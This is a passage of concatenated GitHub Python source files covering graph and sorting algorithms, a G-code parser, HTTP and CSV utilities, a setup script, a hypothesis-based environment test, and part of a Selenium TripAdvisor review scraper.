= make_set(v)\n v2node[vertex] = v\n\n edges = sorted(g.edges(), key = g.edge_weight)\n # print(edges)\n\n for edge in edges:\n u, v = v2node[edge[0]], v2node[edge[1]]\n if find_set(u) != find_set(v):\n A.append(edge)\n union(u, v)\n \n return A\n\nif __name__ == '__main__':\n g = digraph()\n nodes = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\n g.add_nodes(nodes)\n g.add_edge(('a', 'b'), 4)\n g.add_edge(('b', 'c'), 8)\n g.add_edge(('a', 'h'), 8)\n g.add_edge(('b', 'h'), 11)\n g.add_edge(('h', 'i'), 7)\n g.add_edge(('h', 'g'), 1)\n g.add_edge(('i', 'g'), 6)\n g.add_edge(('i', 'c'), 2)\n g.add_edge(('c', 'd'), 7)\n g.add_edge(('c', 'f'), 4)\n g.add_edge(('g', 'f'), 2)\n g.add_edge(('d', 'e'), 9)\n g.add_edge(('d', 'f'), 14)\n g.add_edge(('e', 'f'), 10)\n \n A = mst_kruskal(g)\n print(A)","repo_name":"RicardoZiTseng/CLRS_algorithms_implement","sub_path":"Graph/mst_kruscal.py","file_name":"mst_kruscal.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"29098969784","text":"\n__author__ = 'Stefan Hechenberger '\n\n\nimport math\nimport sys\nimport re\nimport os.path\nimport StringIO\n\ndebug = True\n\n\nclass GcodeReader:\n \"\"\"Parse subset of G-Code.\n\n GCODE OVERVIEW\n --------------\n See: http://linuxcnc.org/docs/html/gcode.html\n\n G0 - rapid move\n G1 - linear move\n G2,G3 - arc move\n G4 - dwell\n\n G17 - select XY-plane (default)\n G18 - select XZ-plane\n G19 - select YZ-plane\n\n G20 - inch mode\n G21 - mm mode (default)\n\n G28 - park machine\n - without params, move to machine 0,0,0\n - with params, first go there (in current cs), typ retract Z\n - (unless G28.1 programmed a different origin)\n - \"G28 G91 Z0, G90\" typically before tool change, same as \"G53 Z0, G53 X0 Y0\"\n\n G38.2-G38.5 - probe\n\n G53 - use machine coorinates for same block (G53 Z15), non-modal\n G54 - use CS 1 from now on (default)\n G55-G59 - more custom CSes\n\n G90 - absolute mode (default)\n G91 - relative mode\n\n G92 - move CS (throw error)\n\n G93 - inverse time mode\n G94 - units/mm mode (default)\n G95 - units/rev mode\n\n\n M0, M1 - pause\n M2, M30 - end\n\n M3 - start 
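In the mst_kruscal record above, line 4 of the transcribed CLRS pseudocode should read "nondecreasing" (matching line 5), and "Discription" is a typo for "Description". To make the union/find mechanics concrete, here is a dependency-free sketch of the same algorithm using a plain parent array instead of the pygraph/tree_node helpers:

def kruskal(n, edges):
    """edges: list of (weight, u, v) tuples; returns the MST edge list."""
    parent = list(range(n))

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    mst = []
    for w, u, v in sorted(edges):          # nondecreasing weight order
        ru, rv = find(u), find(v)
        if ru != rv:                       # edge joins two components
            parent[ru] = rv
            mst.append((u, v, w))
    return mst

print(kruskal(4, [(1, 0, 1), (2, 1, 2), (3, 0, 2), (4, 2, 3)]))
# -> [(0, 1, 1), (1, 2, 2), (2, 3, 4)]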
spindle CW at whatever S has been set to\n M4 - start spindle CCW at whatever S has been set to\n M5 - stop spindle\n\n M6 - stop, prompt for tool change, non-modal\n - to whatever the most recent Tx was\n\n M7 - mist coolant on\n M8 - flood coolant on\n M9 - all coolant off\n\n M62-M65 - switch digital output\n\n\n Sx - spindle speed in RPMs\n\n Fx - feedrate (default: mm/min)\n\n Tx - set active tool mode, schedule actual switch with M6\n\n\n STRATEGY\n --------\n One pass for every tool. UI to run one pass after the other.\n\n - tool\n - path\n - params: feedrate, spindle, coolant\n - move\n - move\n - params: feedrate, spindle, coolant\n - move\n - move\n - ...\n - retract\n - tool\n - ...\n\n One path/tool. Within path, a series of moves and param changes.\n Treat rapid moves like feeds with different rate.\n\n\n OUTPUT\n ------\n Output is a job with a 'kind':'mill' marker in the 'head'. The actual\n data is in 'defs':{'data':[]}. Every tool becomes one data entry.\n A data path is a series of moves and param changes.\n\n A def looks like this:\n {data':[], 'tool':'', 'toolinfo':''}\n\n The format of a data path is a series of possible action items:\n - ('G0',(x,y,z)) (mapped to move with seekrate)\n - ('G1',(x,y,z)) (mapped to move with feedrate)\n - ('F',rate) (mapped to feedrate)\n - ('S',freq) (mapped to intensity)\n - ('MIST', onoff) (mapped to air_on/off)\n - ('FLOOD', onoff) (mapped to aux_on/off)\n\n Path example (job['defs'][0]['data']):\n [('G0',(x,y,z)), ('F', 1000), ('S', 18000), ('FLOOD', True), ('G1', (x,y,z))]\n\n\n \"\"\"\n\n def __init__(self):\n # flags\n self.bTool = False\n\n # modal state\n self.G_motion = 'G0'\n self.X_pos = None\n self.Y_pos = None\n self.Z_pos = None\n self.F_rate = 0\n self.S_freq = 0\n self.S_on = False\n self.T_num = 0\n self.M_mist = False\n self.M_flood = False\n\n # tools table\n self.def_ = None\n self.toolinfo = {}\n self.rates = []\n self.freqs = []\n self.mists = False\n self.floods = False\n\n # regexes\n self.re_parts = re.compile('(X|Y|Z|G|M|T|S|F)(-?[0-9]+\\.?[0-9]*(?:e-?[0-9]*)?)').findall\n self.re_toolchange = re.compile('(M6)').findall\n self.re_T = re.compile('(T)([0-9]+)').findall\n self.re_toolinfo = re.compile('\\((T[0-9]+) *(.+) *\\)').findall\n\n # output job\n self.job = {'head':{'kind':'mill'}, 'defs':[]}\n\n\n def finalize_pass(self):\n if self.def_:\n self.def_['rates'] = self.rates\n self.def_['freqs'] = self.freqs\n self.def_['mists'] = self.mists\n self.def_['floods'] = self.floods\n\n\n def next_pass(self):\n self.rates = []\n self.freqs = []\n self.mists = False\n self.floods = False\n self.job['defs'].append({'data':[], 'tool':'', 'toolinfo':''})\n self.def_ = self.job['defs'][-1]\n self.path = self.def_['data']\n\n\n def on_toolchange(self, line):\n \"\"\"Handle a tool change action (M6).\n Account for T action on same line (nothing more).\n \"\"\"\n T_code = self.re_T(line)\n if len(T_code) == 1:\n self.T_num = T_code[0][1]\n nParts = 2\n else:\n nParts = 1\n # commit tool change\n if len(self.re_parts(line)) != nParts:\n print(\"ERROR: cannot handle anything but T on M6 toolchange line\")\n else:\n self.finalize_pass()\n self.next_pass()\n self.bTool = True\n # add tool, toolinfo to def\n tool = 'T'+str(self.T_num)\n self.def_['tool'] = tool\n if tool in self.toolinfo:\n self.def_['toolinfo'] = self.toolinfo[tool]\n\n\n def on_action(self, action):\n if not self.bTool:\n print(\"ERROR: no tool defined at: %s:%s\" % action)\n return\n self.path.append(action)\n\n\n def parse(self, gcodestring):\n 
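To see how the re_parts pattern above tokenizes a block into (letter, number) words, a standalone check using the same regex:

import re

re_parts = re.compile(r'(X|Y|Z|G|M|T|S|F)(-?[0-9]+\.?[0-9]*(?:e-?[0-9]*)?)').findall
print(re_parts('G1 X12.5 Y-3.0 F1000'))
# -> [('G', '1'), ('X', '12.5'), ('Y', '-3.0'), ('F', '1000')]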
\"\"\"Convert gcode to a job file.\"\"\"\n for line in gcodestring.splitlines():\n # reject line condition\n if len(line) == 0 or line[0] not in ('X', 'Y', 'Z', 'G', 'M', 'T', 'S', 'F'):\n # parse tool table\n if line.startswith('(T'):\n toolinfo = self.re_toolinfo(line)\n if toolinfo:\n self.toolinfo[toolinfo[0][0]] = (toolinfo[0][1])\n # reject\n else:\n continue\n\n # on tool change action (M6)\n if self.re_toolchange(line):\n self.on_toolchange(line)\n continue\n\n bMotion = False\n bFeed = False\n bSpindle = False\n bMist = False\n bFlood = False\n\n # lines with valid start char\n for code_ in self.re_parts(line):\n # convert numeral\n code = [code_[0], float(code_[1])]\n if code[1].is_integer(): code[1] = int(code[1])\n # target coordinates\n if code[0] == 'X':\n self.X_pos = code[1]\n bMotion = True\n elif code[0] == 'Y':\n self.Y_pos = code[1]\n bMotion = True\n elif code[0] == 'Z':\n self.Z_pos = code[1]\n bMotion = True\n # params: feedrate, freq, tool\n elif code[0] == 'F':\n self.F_rate = code[1]\n bFeed = True\n elif code[0] == 'S':\n self.S_freq = code[1]\n elif code[0] == 'T':\n self.T_num = code[1]\n # spindle frequency change\n elif code[0] == 'M' and code[1] in (3,5):\n if code[1] == 3:\n self.S_on = True\n bSpindle = True\n elif code[1] == 5:\n self.S_on = False\n bSpindle = True\n # coolant valve change\n elif code[0] == 'M' and code[1] in (7,8,9):\n if code[1] == 7:\n if not self.M_mist:\n self.M_mist = True\n bMist = True\n elif code[1] == 8:\n if not self.M_flood:\n self.M_flood = True\n bFlood = True\n elif code[1] == 9:\n if self.M_mist:\n self.M_mist = False\n bMist = True\n if self.M_flood:\n self.M_flood = False\n bFlood = True\n # motion style change\n elif code[0] == 'G' and code[1] in (0,1):\n self.G_motion = 'G'+str(code[1])\n # handle reporting of unsupported gcode\n elif code[0] == 'G' and code[1] in (2,3):\n print(\"ERROR: G2,G3 arc motions not supported\")\n elif code[0] == 'G' and code[1] in (4,):\n print(\"ERROR: G4 dwell motions not supported\")\n elif code[0] == 'G' and code[1] in (53,):\n print(\"ERROR: G53 machine CS motion not supported\")\n elif code[0] == 'G' and code[1] in (55,56,57,58,59):\n print(\"ERROR: G55-G59 CS not supported\")\n elif code[0] == 'G' and code[1] in (91,):\n print(\"ERROR: G91 relative motion not supported\")\n elif code[0] == 'G' and code[1] in (92,):\n print(\"ERROR: G92 shift CS not supported\")\n elif code[0] == 'G' and code[1] in (93,95):\n print(\"ERROR: G93,G95 alternative distance modes not supported\")\n elif code[0] == 'M' and code[1] in (0,1):\n print(\"ERROR: M0,M1 pause not supported\")\n elif code[0] == 'M' and code[1] in (4,):\n print(\"ERROR: M4 reverse spindle not supported\")\n elif code[0] == 'M' and code[1] == (20,):\n print(\"ERROR: inch units not supported\")\n\n ### commit actions in right order\n # commit coolant\n if bMist:\n self.on_action(('MIST',self.M_mist))\n self.mists = True\n if bFlood:\n self.on_action(('FLOOD',self.M_flood))\n self.floods = True\n # commit spindle\n if bSpindle:\n if self.S_on:\n self.on_action(('S',self.S_freq))\n self.freqs.append(self.S_freq)\n else:\n self.on_action(('S',0))\n # commit feedrate\n if bFeed:\n self.on_action(('F',self.F_rate))\n self.rates.append(self.F_rate)\n # commit motion\n if bMotion:\n self.on_action((self.G_motion,(self.X_pos, self.Y_pos, self.Z_pos)))\n\n self.finalize_pass()\n return self.job\n\n\nif __name__ == '__main__':\n path = sys.argv[1]\n with open(path, 'r') as content_file:\n content = content_file.read()\n reader = GcodeReader()\n 
job = reader.parse(content)\n print(job)\n","repo_name":"nortd/driveboardapp","sub_path":"backend/jobimport/gcode_reader.py","file_name":"gcode_reader.py","file_ext":"py","file_size_in_byte":10714,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"92"} +{"seq_id":"73104042220","text":"#coding:utf8\n\n'''\nTools for Http request and response.\n\n@author: LeoTse\n'''\n\nimport os\nimport json\nimport urllib2\nimport httplib\nimport commands\n\n'''\nCall GET method API and return the response.\n\n@param server_conf:format {\"gateway\":\"gateway info\"}\n@param params:format [(\"param1\", \"value1\"), (\"param2\", \"value2\"), ...] \n'''\ndef invoke_get_api(server_conf, api, params):\n # url example: http://192.168.9.245/videos?id=0&hash=\"acxd23asd2dafpiojufdufhiqofqo\"\n gateway = server_conf[\"gateway\"]\n params_str = \"&\".join([\"=\".join(e) for e in params])\n \n # you can use below but sometimes it can't work when data is too long.\n # The reason is that .read() isn't guaranteed to return the entire response, given the nature of sockets.\n# url = \"http://{gateway}/{api}?{params_str}\".format(gateway=gateway, api=api, params_str=params_str)\n# req = urllib2.Request(url) \n# rep = urllib2.urlopen(req)\n# res = rep.read()\n \n ip_addr, port = gateway.split(\":\")\n http_conn = httplib.HTTPConnection(ip_addr, port)\n http_conn.request(\"GET\", \"/{api}?{params_str}\".format(api=api, params_str=params_str))\n res = http_conn.getresponse().read()\n \n return res\n \n'''\nCall POST method API and return the response.\n\n@param server_conf:format {\"gateway\":\"gateway info\"}\n@param post_data:format {\"key1\":\"value1\",\"key2\":\"value2\", ...} \n'''\ndef invoke_post_api(server_conf, api, post_data):\n # url\n gateway = server_conf[\"gateway\"]\n post_data_urlencode = json.dumps(post_data)\n\n url = \"http://{gateway}/{api}\".format(gateway=gateway, api=api)\n req = urllib2.Request(url=url, data=post_data_urlencode)\n rep = urllib2.urlopen(req)\n res = rep.read()\n\n return res\n\n'''\nDownload file from given url and store it in given path.\n'''\ndef download_file_by_url(file_url, file_name, file_store_path):\n # example:\n # wget -O /home/leotse/test/test.mp4 \\\n # http://192.168.9.230:9096/group1/M00/00/00/wKgJ51VasR6AdCYSAI58WC-SRBw304.mp4\n file_path = os.path.join(file_store_path, file_name)\n rt, _ = commands.getstatusoutput(\"wget -O {dst_path} '{src_url}'\".format(dst_path=file_path, src_url=file_url))\n\n return rt == 0\n\ndef get_content(url):\n response = urllib2.urlopen(url)\n content = response.read()\n response.close()\n return content\n ","repo_name":"leotse90/common_tools","sub_path":"net_utils/http_utils.py","file_name":"http_utils.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"27033714210","text":"def partition(arr,low,high):\r\n pivot=arr[high]\r\n i=low-1 #pointer for greater element\r\n j=0\r\n for j in range(low,high):\r\n if(arr[j]<=pivot):\r\n i+=1\r\n arr[i],arr[j]=arr[j],arr[i]\r\n arr[i+1],arr[high]=arr[high],arr[i+1]\r\n return i+1 \r\n \r\ndef quickSort(arr,low,high):\r\n if(low None\n This function takes a Unicode string and encodes it to the output.\n \"\"\"\n data = []\n basestring_type = six.string_types[0]\n for value in row:\n if not isinstance(value, basestring_type):\n value = '%s' % (value,)\n data.append(value.encode('utf-8'))\n self.writer.writerow(data)\n data = self.queue.getvalue()\n data = 
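The quicksort record above uses the Lomuto partition scheme (last element as pivot); the j = 0 before the loop is dead code. A cleaned-up, runnable version of the partition step:

def partition(arr, low, high):
    pivot = arr[high]              # Lomuto: last element as pivot
    i = low - 1                    # boundary of the <= pivot region
    for j in range(low, high):
        if arr[j] <= pivot:
            i += 1
            arr[i], arr[j] = arr[j], arr[i]
    arr[i + 1], arr[high] = arr[high], arr[i + 1]
    return i + 1

data = [8, 3, 5, 1]
p = partition(data, 0, len(data) - 1)  # pivot 1 ends up at index 0
assert p == 0 and data == [1, 3, 5, 8]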
data.decode('utf-8')\n self.stream.write(data)\n self.queue.truncate(0)\n\n def writerows(self, rows):\n for row in rows:\n self.writerow(row)\n","repo_name":"2ps/djenga","sub_path":"djenga/csv/unicode_csv_writer.py","file_name":"unicode_csv_writer.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"19374192166","text":"from pprint import pprint\n\n\ndef movie_info(movie, genres):\n genres_names = []\n genre_ids = movie[\"genre_ids\"]\n for genre_id in genre_ids:\n for genre in genres:\n if genre_id == genre[\"id\"]:\n genre_name = genre[\"name\"]\n genres_names.append(genre_name)\n\n new_movie_info = {\n \"genre_names\": genres_names,\n \"id\": movie[\"id\"],\n \"overview\": movie[\"overview\"],\n \"title\": movie[\"title\"],\n \"vote_average\": movie[\"vote_average\"],\n }\n\n return new_movie_info\n\n# 함수 def movie_info()를 return을 통해서 값을 설정해줘야한다.","repo_name":"minw0095/TIL","sub_path":"example/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23645723942","text":"#! /usr/bin/python\nimport os\n\nfrom utils.setup_toolbox import mac_address, get_facility_name\nfrom utils.setup_toolbox import get_serial\n\ndef configure_site():\n \"\"\"\n configures toolbox\n :return:\n \"\"\"\n # Configures the site\n # install pip\n print(\"Step 1 : Update laptop\")\n answer = os.system(\"sudo apt-get update\")\n print(\"Step 2: Install Pip.\")\n # os.system(\"sudo apt install python3-pip\")\n os.system(\"python3 -m pip install --user --upgrade pip\")\n #os.system(\"python3 -m venv flask3\")\n os.system(\"python3 -m venv flask3\")\n print(\"*********** SETTING FACILITY DETAILS *****************\")\n os.system(\". flask3/bin/activate && pip3 install -r requirements.txt && sudo apt-get install git\")\n\n print(\"******************************************************\")\n os.system(\". flask3/bin/activate && python3 -c 'from utils.setup_toolbox import \"\n \"get_facility_name; \"\n \"get_facility_name()'\")\n mac_address()\n # get system serial number\n get_serial()\n print(\"*********** END - Facility Configured Successfully *****************\")\n print(\"creating Toolbox Service\")\n os.system(\"sudo cp toolbox.desktop ~/Desktop/\")\n # here is the code for creating the site.\n os.system(\"sudo cp toolbox.service /etc/systemd/system/\")\n os.system(\"sudo systemctl daemon-reload && sudo systemctl start toolbox && sudo systemctl enable toolbox\")\n print(\"FINISHED :creating Toolbox Service \\n\")\n print(\"******************************************************************** \\n\")\n print (\"Lastly select other modules installed !\")\n os.system(\". 
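The nested loops in movie_info above are O(genres × ids) per movie; building an id-to-name dict first is clearer (the trailing Korean comment notes that the function must hand its value back via return, which it does). A sketch with made-up data:

genres = [{"id": 28, "name": "Action"}, {"id": 35, "name": "Comedy"}]
movie = {"genre_ids": [35, 28]}

by_id = {g["id"]: g["name"] for g in genres}  # resolve each id in O(1)
genre_names = [by_id[i] for i in movie["genre_ids"] if i in by_id]
assert genre_names == ["Comedy", "Action"]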
flask3/bin/activate && python3 -c 'from utils.setup_other_apps import \"\n \"choose_app; \"\n \"choose_app()'\")\n print(\"FINISHED :Setting up other modules\")\n return True\n\n\ndef main():\n \"\"\"\n startup function\n :return: boolean\n \"\"\"\n configure_site()\n return True\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DoxDevOps/toolbox-offline-exporter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36697412966","text":"# Similar to finding regex pattern\n# time: O(NM)\n# space O(NM)\n\ndef findLength(self, A: List[int], B: List[int]) -> int:\n dp = [[ 0 for _ in range(len(B)+1)] for j in range(len(A)+1)]\n max_len = 0\n for i in range(1, len(dp)):\n for j in range(1, len(dp[0])):\n if A[i-1] == B[j-1]:\n dp[i][j] = dp[i-1][j-1]+1\n\n for r in dp:\n max_len = max(max(r), max_len)\n return max_len\n\n","repo_name":"adreena/MyStudyCorner","sub_path":"LeetCode/codes/718.py","file_name":"718.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"74440333753","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom itertools import product\n\nimport hypothesis.strategies as st\nfrom hypothesis import given, settings\nfrom hypothesis.stateful import rule, initialize, RuleBasedStateMachine\n\nfrom bees.env import Env\nfrom bees.utils import timing\nfrom bees.tests import strategies as bst\n\n# pylint: disable=no-value-for-parameter, protected-access\n\n\nclass EnvironmentMachine(RuleBasedStateMachine):\n \"\"\" Finite-state machine for testing ``Env`` multi agent environment. \"\"\"\n\n @timing\n @given(env=bst.envs())\n def __init__(self, env: Env):\n super(EnvironmentMachine, self).__init__()\n self.env = env\n\n @initialize()\n @timing\n def reset(self) -> None:\n env = self.env\n obs = env.reset()\n for agent_id, agent_obs in obs.items():\n\n # Calculate correct number of each object type.\n correct_obj_nums = {obj_type: 0 for obj_type in env.obj_type_ids.values()}\n for dx, dy in product(range(-env.sight_len, env.sight_len + 1), repeat=2):\n x = env.agents[agent_id].pos[0] + dx\n y = env.agents[agent_id].pos[1] + dy\n if (x, y) not in product(range(env.width), range(env.height)):\n continue\n for obj_type in env.obj_type_ids.values():\n correct_obj_nums[obj_type] += int(env.grid[x][y][obj_type])\n\n # Calculate number of each object type in returned observations.\n observed_obj_nums = {obj_type: 0 for obj_type in env.obj_type_ids.values()}\n for dx, dy in product(range(-env.sight_len, env.sight_len + 1), repeat=2):\n for obj_type in env.obj_type_ids.values():\n observed_obj_nums[obj_type] += int(agent_obs[obj_type][dx][dy])\n\n assert correct_obj_nums == observed_obj_nums\n\n @rule()\n @timing\n @given(data=st.data())\n def update_pos(self, data: st.DataObject) -> None:\n pos = data.draw(bst.positions(env=self.env))\n move = data.draw(bst.moves(env=self.env))\n new_pos = self.env._update_pos(pos, move)\n\n if pos[0] != new_pos[0]:\n assert pos[1] == new_pos[1]\n assert abs(pos[0] - new_pos[0]) == 1\n if pos[1] != new_pos[1]:\n assert pos[0] == new_pos[0]\n assert abs(pos[1] - new_pos[1]) == 1\n\n @rule()\n def dummy(self) -> None:\n assert True\n\n\nesm = EnvironmentMachine.TestCase\nesm.settings = settings(max_examples=20, stateful_step_count=10, 
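The 718.py record above fills the DP table and then rescans every row for the maximum; tracking the best length inside the fill loop avoids the second pass. Equivalent O(NM) sketch:

def find_length(a, b):
    """Length of the longest common contiguous subarray of a and b."""
    dp = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    best = 0
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                dp[i][j] = dp[i - 1][j - 1] + 1
                best = max(best, dp[i][j])
    return best

assert find_length([1, 2, 3, 2, 1], [3, 2, 1, 4, 7]) == 3  # [3, 2, 1]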
deadline=None)\n","repo_name":"langfield/bees","sub_path":"bees/tests/env/test_state_machine.py","file_name":"test_state_machine.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"150623739","text":"\"\"\"\nThis is an adapted Python script for TripAdvisor user profile scraping from Sanjanaekanayake's profile:\nhttps://github.com/Sanjanaekanayake/tripadvisor-user-profiles-scrapper/blob/main/getUserReviews.py\n\nChanges from the original script:\n* No limit for review count (previously 100)\n* Extra data extracted per review (rating and location)\n* Fixed bugs in the scraping process (removed try-catch block that concealed issues)\n* Added support for browser options to overcome the timeout issue caused in the latest release of Chrome driver\n* Added support for Firefox driver\n* Added progress bards to monitor scraper's progress\n\"\"\"\n\nimport os\nimport csv\nimport re\nimport time\nfrom tqdm import tqdm\n\n# import the webdriver, chrome driver is recommended\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom data_annotation.annotation_file_extractor import read_comments_from_files\n\noptions = Options()\n# options.add_argument('--headless')\noptions.add_argument('--hide-scrollbars')\noptions.add_argument('--disable-gpu')\noptions.add_argument('lang=en')\n\n# driver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n# driver = webdriver.Firefox(GeckoDriverManager().install(), options=options)\n\ndriver = Firefox(executable_path=\"C:\\\\Users\\\\Sofia\\\\Downloads\\\\geckodriver-v0.28.0-win64\\\\geckodriver.exe\",\n firefox_options=options)\n\n# import the webdriver, chrome driver is recommended\ndriver.set_page_load_timeout(2)\nfilename = \"\"\ni = 0\n\n\ndef check_exists_by_xpath(xpath):\n \"\"\"\n Function to check if button exists in HTML to avoid miss-clicks\n :param xpath: The button's XPATH expression to be evaluated\n :return: True, if the button exists, false otherwise\n \"\"\"\n try:\n driver.find_element_by_xpath(xpath)\n except NoSuchElementException:\n return False\n return True\n time.sleep(2)\n\n\ndef write_csv(review_title, review_text, review_date, review_for, review_rating, review_location):\n \"\"\"\n Function to write review details to file\n :param review_title: The title of the review\n :param review_text: The text of the review\n :param review_date: The date the review was published\n :param review_for: The business the review refers to\n :param review_rating: The rating of the review\n :param review_location: The location of the business the review refers to\n :return: None, simply writes review to file\n \"\"\"\n with open(filename, mode='a', newline='', encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerow([str(review_title), str(review_text), str(review_date), str(review_for), str(review_rating),\n str(review_location)])\n\n\ndef write_log(username, error):\n \"\"\"\n Writes error logs related to error in scraping user profiles\n :param username: The user profile the error refers to\n :param error: The error in the scraping process\n :return: None, simply writes the log file\n \"\"\"\n 
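Note that check_exists_by_xpath below ends with an unreachable time.sleep(2) after its return statements, and it reads the module-level driver rather than taking it as a parameter. A cleaned-up version of the same presence check (using the selenium 3 find_element_by_xpath API the file already relies on):

from selenium.common.exceptions import NoSuchElementException

def element_exists(driver, xpath):
    """Return True if an element matching xpath is present, without raising."""
    try:
        driver.find_element_by_xpath(xpath)
    except NoSuchElementException:
        return False
    return True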
filename = \"scrape_bugs.log\"\n with open(filename, mode='a', newline='') as l:\n writer = csv.writer(l)\n writer.writerow([str(username), str(error)])\n\n\ndef get_user_reviews(URL, end_count):\n \"\"\"\n Get all reviews from a user's profile\n :param URL: The user's profile URL to be scraped\n :param end_count: The total number of reviews\n :return: None, simply calls function to write reviews to file\n \"\"\"\n try:\n element_privacy = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.CLASS_NAME, \"evidon-banner-acceptbutton\")))\n ActionChains(driver).move_to_element(element_privacy).click().perform()\n except:\n print(\"\\nNo cookie pop-up!\")\n\n reveiwstab = driver.find_element_by_xpath('//a[@data-tab-name=\"Reviews\"]')\n reveiwstab.click()\n time.sleep(2)\n\n if check_exists_by_xpath(\"//div[@id='content']\"):\n # to expand the review if show more button exists\n if check_exists_by_xpath(\"//span[@class='_1ogwMK0l']\"):\n showmorebutton = driver.find_element_by_xpath(\"//span[@class='_1ogwMK0l']\")\n showmorebutton.click()\n time.sleep(2)\n\n # Scrolls as much as possible to make all reviews appear and gets the total number of reviews\n while driver.find_elements_by_xpath(\"//div[@style='position:relative']/div\"):\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n review = driver.find_elements_by_xpath(\"//div[@style='position:relative']/div\")\n element_count = len(review)\n # covers the cases where review count is different than the one mentioned in TripAdvisor's contributions pop-up\n if end_count - 19 < element_count < end_count + 19:\n print(\"\\nReviews to be parsed: \" + str(element_count))\n break\n else:\n continue\n if element_count is None:\n element_count = []\n # iteration over all reviews\n for j in tqdm(range(element_count)):\n # name = review[j].find_element_by_xpath(\".//div[contains(@class, '_2fxQ4TOx')]\").text\n # extract title\n try:\n review_title = review[j].find_element_by_xpath(\".//div[contains(@class, '_3IEJ3tAK _2K4zZcBv')]\").text\n except NoSuchElementException:\n print(\"\\nCannot find title for this review.\")\n review_title = \"\"\n # extract date (if available)\n try:\n review_date = review[j].find_element_by_xpath(\".//div[contains(@class, '_3Coh9OJA')]\").text\n except NoSuchElementException:\n print(\"\\nCannot find date for this review.\")\n review_date = \"\"\n # extract reviewed business\n review_for = review[j].find_element_by_xpath(\".//div[contains(@class, '_2ys8zX0p ui_link')]\").text\n # Used later to open up review in new tab\n try:\n review_summary = review[j].find_element_by_xpath(\".//div[contains(@class, '_1kKLd-3D')]/a\").get_attribute(\n \"href\")\n except NoSuchElementException:\n print(\"\\nCannot find the element for this review.\")\n continue\n # extract reviewed business' location\n try:\n review_location = review[j].find_element_by_xpath(\".//div[contains(@class, '_7JBZK6_8 _20BneOSW')]\").text\n except NoSuchElementException:\n print(\"\\nCannot find location for this review.\")\n review_location = \"\"\n # extract rating\n review_rating = 5\n if check_exists_by_xpath(\"//span[@class='ui_bubble_rating bubble_40']\"):\n review_rating = 4\n elif check_exists_by_xpath(\"//span[@class='ui_bubble_rating bubble_30']\"):\n review_rating = 3\n elif check_exists_by_xpath(\"//span[@class='ui_bubble_rating bubble_20']\"):\n review_rating = 2\n if check_exists_by_xpath(\"//span[@class='ui_bubble_rating bubble_10']\"):\n review_rating = 1\n\n driver.execute_script(\"window.open('');\")\n 
driver.switch_to.window(driver.window_handles[1])\n driver.get(review_summary)\n time.sleep(2)\n\n # Get review full text\n if check_exists_by_xpath(\"//span[@class='fullText hidden']\"):\n try:\n read_more_button = driver.find_elements_by_xpath(\n \"//div[@class='reviewSelector']/div/div[2]/div[3]/div/p/span\")\n read_more_button[2].click()\n review_text = read_more_button[1].text\n except IndexError:\n review_details = driver.find_elements_by_xpath(\"//span[@class='fullText hidden']\")[0]\n review_text = review_details.text\n # print(\"\\n--------------1st IF: \" + review_text)\n elif check_exists_by_xpath(\"//span[@class='fullText ']\"):\n try:\n read_more_button = driver.find_elements_by_xpath(\n \"//div[@class='reviewSelector']/div/div[2]/div[3]/div/p/span\")\n review_text = read_more_button[0].text\n except IndexError:\n review_details = driver.find_elements_by_xpath(\"//span[@class='fullText ']\")[0]\n review_text = review_details.text\n # print(\"\\n************2nd IF: \" + review_text)\n elif check_exists_by_xpath(\"//p[@class='partial_entry']\"):\n review_details = driver.find_elements_by_xpath(\"//p[@class='partial_entry']\")[0]\n review_text = review_details.text\n # print(\"\\n-----------3rd IF: \" + review_text)\n elif check_exists_by_xpath(\"//div[@class='entry vrReviewText']\"):\n review_details = driver.find_elements_by_xpath(\"//div[@class='entry vrReviewText']\")[0]\n review_text = review_details.text\n # print(\"\\n^^^^^^^^^^^4rd IF: \" + review_text)\n else:\n review_details = driver.find_elements_by_xpath(\n \"//div[@class='reviewSelector']/div/div[2]/div/div/div[3]/div/p\")\n try:\n review_text = review_details[0].text\n except IndexError:\n review_text = \"\"\n print(\"Cannot find text for this review.\")\n # print(\"\\n$$$$$$$$$$5th IF: \" + review_text)\n\n driver.close()\n driver.switch_to.window(driver.window_handles[0])\n # print(\"Review to be written to file: \" + review_title)\n # print(review_text)\n write_csv(review_title, review_text, review_date, review_for, review_rating, review_location)\n\n\ndef get_user_profile_by_url(URL):\n \"\"\"\n Based on the given URL, we scrape the respective user's profile\n :param URL: The profile URL to be scraped\n :return: None, simply handles the scraping process and writes to file\n \"\"\"\n print(\"\\nScraping: \" 